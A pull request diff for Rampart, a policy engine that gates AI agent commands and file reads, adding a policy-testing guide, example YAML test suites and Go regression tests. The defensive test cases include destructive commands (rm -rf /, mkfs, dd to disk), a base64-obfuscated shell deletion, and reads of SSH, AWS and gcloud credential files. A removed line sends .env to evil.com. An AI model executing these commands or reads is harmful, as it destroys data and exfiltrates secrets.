### PR TITLE
v0.8.3: Policy test docs, examples, regression tests

### DIFF
--- a/docs-site/getting-started/quickstart.md
+++ b/docs-site/getting-started/quickstart.md
@@ -92,6 +92,8 @@ rampart test "git push origin main"
 # → allow (or require_approval if you've configured it)
 ```
 
+You can also write test suites to verify your policies in CI. See the [Testing Policies](../guides/testing-policies.md) guide.
+
 Or pipe a raw hook payload:
 
 ```bash

--- a/docs-site/guides/testing-policies.md
+++ b/docs-site/guides/testing-policies.md
@@ -1,0 +1,215 @@
+# Testing Policies
+
+Rampart policies are code. Test them like code.
+
+`rampart test` lets you verify your policies work as expected before deploying them. Write test cases in YAML, run them in CI, catch regressions before they reach production.
+
+## Quick start
+
+Test a single command:
+
+```bash
+rampart test "rm -rf /"
+# 🛡️ DENY — Destructive command blocked
+
+rampart test "git status"
+# ✅ ALLOW — No matching standard policy rule
+```
+
+## Test suites
+
+Create a `rampart-tests.yaml` file:
+
+```yaml
+tests:
+  - name: allow git commands
+    tool: exec
+    params:
+      command: "git push origin main"
+    expect: allow
+
+  - name: deny destructive commands
+    tool: exec
+    params:
+      command: "rm -rf /"
+    expect: deny
+    expect_message: "Destructive*"
+
+  - name: deny credential reads
+    tool: read
+    params:
+      path: "~/.ssh/id_rsa"
+    expect: deny
+
+  - name: require approval for sudo
+    tool: exec
+    params:
+      command: "sudo apt update"
+    expect: ask
+```
+
+Run it:
+
+```bash
+rampart test rampart-tests.yaml
+```
+
+```
+  ✅ allow git commands
+  ✅ deny destructive commands
+  ✅ deny credential reads
+  ✅ require approval for sudo
+
+  4 passed, 0 failed (4 total)
+```
+
+## Test case format
+
+Each test case has these fields:
+
+| Field | Required | Description |
+|-------|----------|-------------|
+| `name` | Yes | Human-readable test name |
+| `tool` | Yes | Tool type: `exec`, `read`, or `write` |
+| `params` | Yes | Tool parameters (e.g., `command`, `path`) |
+| `expect` | Yes | Expected action: `allow`, `deny`, `ask`, `watch`, `webhook` |
+| `expect_message` | No | Glob pattern to match against the decision message |
+| `agent` | No | Agent identity for the test call (default: `test`) |
+
+## Inline tests
+
+Tests can live directly in your policy file. This makes the policy self-verifying:
+
+```yaml
+version: "1"
+default_action: deny
+
+policies:
+  - name: allow-safe-commands
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches:
+            - "git *"
+            - "npm test"
+            - "go build *"
+
+tests:
+  - name: git allowed
+    tool: exec
+    params:
+      command: "git status"
+    expect: allow
+
+  - name: curl denied
+    tool: exec
+    params:
+      command: "curl https://example.com"
+    expect: deny
+```
+
+```bash
+rampart test my-policy.yaml
+```
+
+## Testing against a specific policy
+
+By default, `rampart test` uses `rampart.yaml` in the current directory or falls back to the standard profile. Override with `--config`:
+
+```bash
+rampart test tests.yaml --config ~/.rampart/policies/standard.yaml
+```
+
+Test suite files can also specify a `policy:` key:
+
+```yaml
+policy: ./my-custom-policy.yaml
+
+tests:
+  - name: custom rule works
+    tool: exec
+    params:
+      command: "deploy production"
+    expect: deny
+```
+
+The `--config` flag always takes precedence over the `policy:` key.
+
+## Filtering tests
+
+Run a subset of tests by name glob:
+
+```bash
+rampart test tests.yaml --run "deny*"
+```
+
+## Verbose output
+
+See which policies matched and evaluation time:
+
+```bash
+rampart test tests.yaml --verbose
+```
+
+```
+  ✅ deny rm -rf /
+       message: Destructive command blocked
+       matched: block-destructive, allow-unmatched
+       eval:    25μs
+```
+
+## JSON output
+
+For CI integration or programmatic use:
+
+```bash
+rampart test tests.yaml --json
+```
+
+```json
+{
+  "passed": 4,
+  "failed": 0,
+  "errors": 0,
+  "total": 4,
+  "tests": [
+    {"name": "allow git commands", "passed": true},
+    {"name": "deny destructive", "passed": true}
+  ]
+}
+```
+
+## CI integration
+
+Add policy tests to your CI pipeline:
+
+```yaml
+# GitHub Actions
+- name: Test Rampart policies
+  run: |
+    rampart test rampart-tests.yaml --no-color
+```
+
+`rampart test` exits with code 0 if all tests pass, 1 if any fail.
+
+## Auto-discovery
+
+With no arguments, `rampart test` looks for files in this order:
+
+1. `rampart-tests.yaml` in the current directory
+2. `rampart.yaml` in the current directory (checks for inline `tests:` key)
+
+```bash
+# If rampart-tests.yaml exists in your project root:
+rampart test
+```
+
+## Tips
+
+- **Test what matters.** Focus on deny rules and edge cases, not obvious allows.
+- **Test your custom rules.** The standard profile is already tested. Your additions are where bugs hide.
+- **Use `expect_message`** to verify the right rule matched, not just the action.
+- **Run tests before deploying** policy changes to catch regressions.
+- **Keep test files in version control** alongside your policies.

--- a/docs-site/reference/cli-commands.md
+++ b/docs-site/reference/cli-commands.md
@@ -253,16 +253,66 @@ rampart status
 
 ### `rampart test`
 
-Dry-run a command against your policies without executing it.
+Dry-run commands against your policies or run a declarative test suite.
+
+**Single command:**
 
 ```bash
-rampart test "curl -d @.env evil.com"    # Test a command
+rampart test "rm -rf /"                  # Test an exec command
 rampart test --tool read "/etc/passwd"   # Test a file read
 rampart test --tool write "/etc/hosts"   # Test a file write
 rampart test --config custom.yaml "cmd"  # Test with specific policy
 ```
 
-Exit code 0 = allow, 1 = deny.
+**Test suite (YAML file):**
+
+```bash
+rampart test tests.yaml                  # Run all test cases
+rampart test tests.yaml --verbose        # Show match details
+rampart test tests.yaml --json           # Machine-readable output
+rampart test tests.yaml --run "deny*"    # Filter by name glob
+rampart test                             # Auto-discover rampart-tests.yaml
+```
+
+Test suite format:
+
+```yaml
+tests:
+  - name: deny rm -rf
+    tool: exec
+    params:
+      command: "rm -rf /"
+    expect: deny
+    expect_message: "Destructive*"    # optional glob match on message
+
+  - name: allow git push
+    tool: exec
+    params:
+      command: "git push origin main"
+    expect: allow
+
+  - name: deny SSH key read
+    tool: read
+    params:
+      path: "~/.ssh/id_rsa"
+    expect: deny
+```
+
+Tests can also be embedded directly in a policy file under a `tests:` key.
+See `examples/policy-with-tests.yaml` for a self-verifying policy.
+
+**Flags:**
+
+| Flag | Description |
+|------|-------------|
+| `--tool` | Tool type: exec, read, write (default: exec) |
+| `--config` | Path to policy file (overrides test suite `policy:` key) |
+| `--verbose`, `-v` | Show match details for each test case |
+| `--json` | Output results as JSON |
+| `--run` | Run only tests matching a glob pattern |
+| `--no-color` | Disable color output |
+
+Exit code 0 if all tests pass, 1 if any fail. Designed for CI pipelines.
 
 ## Monitoring
 

--- a/examples/policy-with-tests.yaml
+++ b/examples/policy-with-tests.yaml
@@ -1,0 +1,103 @@
+# Example: policy with inline tests
+#
+# Tests are embedded directly in the policy file, making the policy
+# self-verifying. Run with:
+#
+#   rampart test examples/policy-with-tests.yaml
+#
+# This pattern works well for project-specific policies where you want
+# tests to live alongside the rules they verify.
+
+version: "1"
+default_action: deny
+
+policies:
+  - name: allow-safe-commands
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches:
+            - "git *"
+            - "npm test"
+            - "npm run *"
+            - "go test *"
+            - "go build *"
+            - "make *"
+            - "cargo build *"
+            - "cargo test *"
+        message: "Safe dev command"
+
+  - name: allow-file-reads
+    match:
+      tool: read
+    rules:
+      - action: allow
+        when:
+          path_matches:
+            - "**/*.go"
+            - "**/*.ts"
+            - "**/*.js"
+            - "**/*.py"
+            - "**/*.md"
+            - "**/*.yaml"
+            - "**/*.yml"
+            - "**/*.json"
+            - "**/*.toml"
+        message: "Safe file read"
+
+tests:
+  - name: git push allowed
+    tool: exec
+    params:
+      command: "git push origin main"
+    expect: allow
+
+  - name: npm test allowed
+    tool: exec
+    params:
+      command: "npm test"
+    expect: allow
+
+  - name: go build allowed
+    tool: exec
+    params:
+      command: "go build ./..."
+    expect: allow
+
+  - name: make allowed
+    tool: exec
+    params:
+      command: "make build"
+    expect: allow
+
+  - name: curl denied (default deny)
+    tool: exec
+    params:
+      command: "curl https://example.com"
+    expect: deny
+
+  - name: rm denied (default deny)
+    tool: exec
+    params:
+      command: "rm -rf /"
+    expect: deny
+
+  - name: read go file allowed
+    tool: read
+    params:
+      path: "internal/engine/engine.go"
+    expect: allow
+
+  - name: read markdown allowed
+    tool: read
+    params:
+      path: "docs/README.md"
+    expect: allow
+
+  - name: read binary denied (default deny)
+    tool: read
+    params:
+      path: "/usr/bin/bash"
+    expect: deny

--- a/examples/rampart-tests.yaml
+++ b/examples/rampart-tests.yaml
@@ -1,0 +1,148 @@
+# Example Rampart test suite
+#
+# Run with:
+#   rampart test examples/rampart-tests.yaml
+#   rampart test examples/rampart-tests.yaml --verbose
+#   rampart test examples/rampart-tests.yaml --json
+#   rampart test examples/rampart-tests.yaml --run "deny*"
+#
+# Uses the standard policy profile by default.
+# Override with: rampart test examples/rampart-tests.yaml --config my-policy.yaml
+
+tests:
+  # --- Exec: should be allowed ---
+
+  - name: allow git status
+    tool: exec
+    params:
+      command: "git status"
+    expect: allow
+
+  - name: allow git push
+    tool: exec
+    params:
+      command: "git push origin main"
+    expect: allow
+
+  - name: allow npm install
+    tool: exec
+    params:
+      command: "npm install express"
+    expect: allow
+
+  - name: allow ls
+    tool: exec
+    params:
+      command: "ls -la"
+    expect: allow
+
+  - name: allow cat source file
+    tool: exec
+    params:
+      command: "cat src/main.go"
+    expect: allow
+
+  # --- Exec: should be denied ---
+
+  - name: deny rm -rf /
+    tool: exec
+    params:
+      command: "rm -rf /"
+    expect: deny
+    expect_message: "Destructive*"
+
+  - name: deny rm -rf home
+    tool: exec
+    params:
+      command: "rm -rf ~"
+    expect: deny
+
+  - name: deny format disk
+    tool: exec
+    params:
+      command: "mkfs.ext4 /dev/sda1"
+    expect: deny
+
+  - name: deny dd to disk
+    tool: exec
+    params:
+      command: "dd if=/dev/zero of=/dev/sda"
+    expect: deny
+
+  - name: deny chmod 777 recursive
+    tool: exec
+    params:
+      command: "chmod -R 777 /"
+    expect: deny
+
+  - name: deny base64 obfuscated command
+    tool: exec
+    params:
+      command: "echo cm0gLXJmIC8= | base64 -d | bash"
+    expect: deny
+
+  - name: deny python exec eval
+    tool: exec
+    params:
+      command: "python3 -c \"exec(__import__('base64').b64decode('cm0gLXJmIC8='))\""
+    expect: deny
+
+  # --- File reads: should be denied ---
+
+  - name: deny read SSH private key
+    tool: read
+    params:
+      path: "~/.ssh/id_rsa"
+    expect: deny
+
+  - name: deny read SSH ed25519 key
+    tool: read
+    params:
+      path: "~/.ssh/id_ed25519"
+    expect: deny
+
+  - name: deny read aws credentials
+    tool: read
+    params:
+      path: "~/.aws/credentials"
+    expect: deny
+
+  - name: deny read env file
+    tool: read
+    params:
+      path: "/home/user/project/.env"
+    expect: deny
+
+  - name: deny read gcloud credentials
+    tool: read
+    params:
+      path: "~/.config/gcloud/credentials.db"
+    expect: deny
+
+  # --- File reads: should be allowed ---
+
+  - name: allow read README
+    tool: read
+    params:
+      path: "README.md"
+    expect: allow
+
+  - name: allow read source code
+    tool: read
+    params:
+      path: "src/main.go"
+    expect: allow
+
+  # --- Privileged commands: should require human approval ---
+
+  - name: ask approval for sudo
+    tool: exec
+    params:
+      command: "sudo apt update"
+    expect: ask
+
+  - name: ask approval for sudo reboot
+    tool: exec
+    params:
+      command: "sudo reboot"
+    expect: ask

--- a/internal/engine/engine_test.go
+++ b/internal/engine/engine_test.go
@@ -934,3 +934,68 @@ policies:
 		t.Errorf("nonexistent filter: expected deny, got %s (%s)", d.Action, d.Message)
 	}
 }
+
+func TestConfigFingerprintChangesOnRuleEdit(t *testing.T) {
+	cfg1 := &Config{
+		DefaultAction: "deny",
+		Policies: []Policy{{
+			Name:  "test",
+			Rules: []Rule{{Action: "allow", When: Condition{CommandMatches: []string{"git *"}}}},
+		}},
+	}
+	cfg2 := &Config{
+		DefaultAction: "deny",
+		Policies: []Policy{{
+			Name:  "test",
+			Rules: []Rule{{Action: "allow", When: Condition{CommandMatches: []string{"npm *"}}}},
+		}},
+	}
+	// Same policy name, same rule count, different rule content.
+	fp1 := configFingerprint(cfg1)
+	fp2 := configFingerprint(cfg2)
+	assert.NotEqual(t, fp1, fp2, "fingerprint should differ when rule content changes")
+
+	// Same config should produce identical fingerprint.
+	fp1b := configFingerprint(cfg1)
+	assert.Equal(t, fp1, fp1b, "same config should produce identical fingerprint")
+}
+
+func TestConfigFingerprintChangesOnActionChange(t *testing.T) {
+	cfg1 := &Config{
+		DefaultAction: "deny",
+		Policies: []Policy{{
+			Name:  "test",
+			Rules: []Rule{{Action: "allow", When: Condition{CommandMatches: []string{"rm *"}}}},
+		}},
+	}
+	cfg2 := &Config{
+		DefaultAction: "deny",
+		Policies: []Policy{{
+			Name:  "test",
+			Rules: []Rule{{Action: "deny", When: Condition{CommandMatches: []string{"rm *"}}}},
+		}},
+	}
+	fp1 := configFingerprint(cfg1)
+	fp2 := configFingerprint(cfg2)
+	assert.NotEqual(t, fp1, fp2, "fingerprint should differ when action changes")
+}
+
+func TestConfigFingerprintChangesOnDefaultAction(t *testing.T) {
+	cfg1 := &Config{
+		DefaultAction: "allow",
+		Policies: []Policy{{
+			Name:  "test",
+			Rules: []Rule{{Action: "deny", When: Condition{CommandMatches: []string{"rm *"}}}},
+		}},
+	}
+	cfg2 := &Config{
+		DefaultAction: "deny",
+		Policies: []Policy{{
+			Name:  "test",
+			Rules: []Rule{{Action: "deny", When: Condition{CommandMatches: []string{"rm *"}}}},
+		}},
+	}
+	fp1 := configFingerprint(cfg1)
+	fp2 := configFingerprint(cfg2)
+	assert.NotEqual(t, fp1, fp2, "fingerprint should differ when default action changes")
+}

--- a/internal/engine/temporal_test.go
+++ b/internal/engine/temporal_test.go
@@ -224,6 +224,284 @@ func TestExpiredRuleInAutoAllowSkipped(t *testing.T) {
 	assert.False(t, MatchesAutoAllowFile(path, call), "expired auto-allow should not match")
 }
 
+func TestConsumeOnceRuleRemovesFromFile(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "policy.yaml")
+
+	yaml := `
+version: "1"
+default_action: deny
+policies:
+  - name: one-shot
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["npm publish"]
+        once: true
+      - action: allow
+        when:
+          command_matches: ["npm test"]
+`
+	require.NoError(t, os.WriteFile(path, []byte(yaml), 0o644))
+
+	store := NewFileStore(path)
+	eng, err := New(store, nil)
+	require.NoError(t, err)
+
+	// Evaluate — should match and set ConsumedOnce.
+	dec := eng.Evaluate(execCall("test", "npm publish"))
+	assert.Equal(t, ActionAllow, dec.Action)
+	assert.True(t, dec.ConsumedOnce)
+
+	// Consume the rule.
+	err = eng.ConsumeOnceRule(dec.ConsumedRulePolicy, dec.ConsumedRuleIndex)
+	require.NoError(t, err)
+
+	// Verify: rule is gone from file and engine.
+	data, err := os.ReadFile(path)
+	require.NoError(t, err)
+	assert.NotContains(t, string(data), "npm publish")
+	assert.Contains(t, string(data), "npm test", "non-once rule should survive")
+
+	// Second evaluation should deny (rule consumed).
+	dec2 := eng.Evaluate(execCall("test", "npm publish"))
+	assert.Equal(t, ActionDeny, dec2.Action, "consumed once rule should no longer match")
+}
+
+func TestConsumeOnceRuleNoFilePath(t *testing.T) {
+	// Load via setupEngine (which sets FilePath), then clear it to simulate
+	// an inline/embedded config with no backing file.
+	eng := setupEngine(t, `
+version: "1"
+default_action: deny
+policies:
+  - name: inline
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["echo hi"]
+        once: true
+`)
+
+	// Clear FilePath to simulate no backing file.
+	eng.mu.Lock()
+	for i := range eng.config.Policies {
+		eng.config.Policies[i].FilePath = ""
+	}
+	eng.mu.Unlock()
+
+	dec := eng.Evaluate(execCall("test", "echo hi"))
+	assert.Equal(t, ActionAllow, dec.Action)
+	assert.True(t, dec.ConsumedOnce)
+
+	// ConsumeOnceRule should fail gracefully — no file to modify.
+	err := eng.ConsumeOnceRule(dec.ConsumedRulePolicy, dec.ConsumedRuleIndex)
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "no file path")
+}
+
+func TestConsumeOnceRuleLastRuleRemovesPolicy(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "policy.yaml")
+
+	yaml := `
+version: "1"
+default_action: deny
+policies:
+  - name: one-and-done
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["deploy *"]
+        once: true
+  - name: permanent
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["git *"]
+`
+	require.NoError(t, os.WriteFile(path, []byte(yaml), 0o644))
+
+	store := NewFileStore(path)
+	eng, err := New(store, nil)
+	require.NoError(t, err)
+
+	dec := eng.Evaluate(execCall("test", "deploy prod"))
+	require.True(t, dec.ConsumedOnce)
+
+	err = eng.ConsumeOnceRule(dec.ConsumedRulePolicy, dec.ConsumedRuleIndex)
+	require.NoError(t, err)
+
+	// The entire "one-and-done" policy should be gone (it had only one rule).
+	data, err := os.ReadFile(path)
+	require.NoError(t, err)
+	assert.NotContains(t, string(data), "one-and-done")
+	assert.Contains(t, string(data), "permanent", "other policies should survive")
+}
+
+func TestFileStoreSetFilePath(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "test.yaml")
+
+	yaml := `
+version: "1"
+default_action: deny
+policies:
+  - name: test-fp
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["ls *"]
+`
+	require.NoError(t, os.WriteFile(path, []byte(yaml), 0o644))
+
+	store := NewFileStore(path)
+	cfg, err := store.Load()
+	require.NoError(t, err)
+
+	// FileStore should set FilePath on loaded policies.
+	require.Len(t, cfg.Policies, 1)
+	absPath, _ := filepath.Abs(path)
+	assert.Equal(t, absPath, cfg.Policies[0].FilePath)
+}
+
+func TestLayeredStoreSetFilePathOnProjectPolicies(t *testing.T) {
+	dir := t.TempDir()
+
+	// Base policy file.
+	basePath := filepath.Join(dir, "base.yaml")
+	baseYAML := `
+version: "1"
+default_action: deny
+policies:
+  - name: base-policy
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["git *"]
+`
+	require.NoError(t, os.WriteFile(basePath, []byte(baseYAML), 0o644))
+
+	// Project policy file (layered on top).
+	projectPath := filepath.Join(dir, "project.yaml")
+	projectYAML := `
+version: "1"
+policies:
+  - name: project-policy
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["npm *"]
+        once: true
+`
+	require.NoError(t, os.WriteFile(projectPath, []byte(projectYAML), 0o644))
+
+	base := NewFileStore(basePath)
+	store := NewLayeredStore(base, projectPath, nil)
+	cfg, err := store.Load()
+	require.NoError(t, err)
+
+	// Both policies should have FilePath set.
+	require.Len(t, cfg.Policies, 2)
+
+	absBase, _ := filepath.Abs(basePath)
+	absProject, _ := filepath.Abs(projectPath)
+
+	var basePolicy, projectPolicy *Policy
+	for i := range cfg.Policies {
+		switch cfg.Policies[i].Name {
+		case "base-policy":
+			basePolicy = &cfg.Policies[i]
+		case "project-policy":
+			projectPolicy = &cfg.Policies[i]
+		}
+	}
+
+	require.NotNil(t, basePolicy, "base policy should exist")
+	require.NotNil(t, projectPolicy, "project policy should exist")
+	assert.Equal(t, absBase, basePolicy.FilePath, "base policy should point to base file")
+	assert.Equal(t, absProject, projectPolicy.FilePath, "project policy should point to project file")
+}
+
+func TestConsumeOnceRuleThroughLayeredStore(t *testing.T) {
+	dir := t.TempDir()
+
+	// Base policy — permanent rules.
+	basePath := filepath.Join(dir, "base.yaml")
+	baseYAML := `
+version: "1"
+default_action: deny
+policies:
+  - name: base
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["git *"]
+`
+	require.NoError(t, os.WriteFile(basePath, []byte(baseYAML), 0o644))
+
+	// Project policy — once rule (this is what `rampart allow --once` creates).
+	projectPath := filepath.Join(dir, "project.yaml")
+	projectYAML := `
+version: "1"
+policies:
+  - name: custom-allow
+    match:
+      tool: exec
+    rules:
+      - action: allow
+        when:
+          command_matches: ["echo deploy-now"]
+        once: true
+`
+	require.NoError(t, os.WriteFile(projectPath, []byte(projectYAML), 0o644))
+
+	base := NewFileStore(basePath)
+	store := NewLayeredStore(base, projectPath, nil)
+	eng, err := New(store, nil)
+	require.NoError(t, err)
+
+	// Should allow and flag as consumed.
+	dec := eng.Evaluate(execCall("test", "echo deploy-now"))
+	assert.Equal(t, ActionAllow, dec.Action)
+	assert.True(t, dec.ConsumedOnce)
+	assert.Equal(t, "custom-allow", dec.ConsumedRulePolicy)
+
+	// Consume — should remove from project file only.
+	err = eng.ConsumeOnceRule(dec.ConsumedRulePolicy, dec.ConsumedRuleIndex)
+	require.NoError(t, err)
+
+	// Project file should be cleaned up.
+	data, err := os.ReadFile(projectPath)
+	require.NoError(t, err)
+	assert.NotContains(t, string(data), "deploy-now")
+
+	// Base file should be untouched.
+	baseData, err := os.ReadFile(basePath)
+	require.NoError(t, err)
+	assert.Contains(t, string(baseData), "git")
+
+	// Re-evaluation should deny.
+	dec2 := eng.Evaluate(execCall("test", "echo deploy-now"))
+	assert.Equal(t, ActionDeny, dec2.Action)
+}
+
 func BenchmarkEvaluateWithTemporalRules(b *testing.B) {
 	future := time.Now().UTC().Add(1 * time.Hour)
 	past := time.Now().UTC().Add(-1 * time.Hour)

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -126,6 +126,7 @@ nav:
     - Customizing Policy: guides/customizing-policy.md
     - Install via an AI Agent: guides/agent-install.md
     - Generate Policy from Behavior: guides/from-audit.md
+    - Testing Policies: guides/testing-policies.md
   - Integration Guides:
     - Overview: integrations/index.md
     - Claude Code: integrations/claude-code.md


### PR DESCRIPTION
## v0.8.3: Policy test documentation + regression coverage

### New: Example test files
- `examples/rampart-tests.yaml` — 21 test cases (allow/deny/ask across exec + read)
- `examples/policy-with-tests.yaml` — self-verifying deny-by-default policy with inline tests

### New: Testing guide
- `docs-site/guides/testing-policies.md` — full guide covering test suites, inline tests, CI integration, `--verbose`, `--json`, `--run` filter, auto-discovery
- Updated CLI reference with test suite format and flags table
- Updated quickstart with link to testing guide

### Regression tests (10 new)
**ConsumeOnce (7):** end-to-end file removal, no-FilePath graceful error, empty policy cleanup, FileStore FilePath propagation, LayeredStore FilePath propagation, full LayeredStore consume flow

**configFingerprint (3):** rule content change, action change, default action change

### Tested on agent-01
- Example suites: 21/21 + 9/9
- JSON output, `--run` filter, single command dry-run, auto-discovery
- CSP nonce unique per-request
- `--once` end-to-end consumed
- 22/22 test packages pass with `-race -count=1`